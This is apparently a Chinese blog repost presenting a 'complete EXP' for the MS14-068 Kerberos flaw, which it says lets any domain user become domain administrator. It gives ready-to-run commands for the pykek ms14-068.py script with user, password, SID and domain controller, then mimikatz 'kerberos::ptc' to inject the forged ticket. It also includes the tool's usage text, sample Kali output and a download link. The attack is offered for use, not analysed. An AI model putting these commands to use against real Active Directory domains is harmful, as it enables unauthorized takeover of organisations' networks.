zoukankan      html  css  js  c++  java
  • [提权]域内提权神器 MS14-068 完整EXP

     可以让任何域内用户提升为域管理员

     

     

    c:python27python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.local
    mimikatz.exe "kerberos::ptc TGT_k8test3@k8.local.ccache" exit

     

       

    ms14-068.py

    Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

    Domain Users (513)

    Domain Admins (512)

    Schema Admins (518)

    Enterprise Admins (519)

    Group Policy Creator Owners (520)

    USAGE:

    ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

     

    OPTIONS:

    -p <clearPassword>

    --rc4 <ntlmHash>

    Example usage :

     

    Linux (tested with samba and MIT Kerberos)

     

    root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

    Password:

    [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!

    [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!

    [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!

    [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!

    [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!

    [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!

    [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!

    [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!

    [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!

    root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0

    On Windows

    python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

    mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`

    下载地址

    https://github.com/bidord/pykek

  • 相关阅读:
    P、NP及NPC问题
    latex test3
    latex test2
    test
    整体二分
    bzoj2819 nim (树上带修改查询路径异或和)
    kmp模板题
    KM的三种写法比较
    电视转播
    树状数组处理区间查询和区间修改的问题
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5382774.html
Copyright © 2011-2022 走看看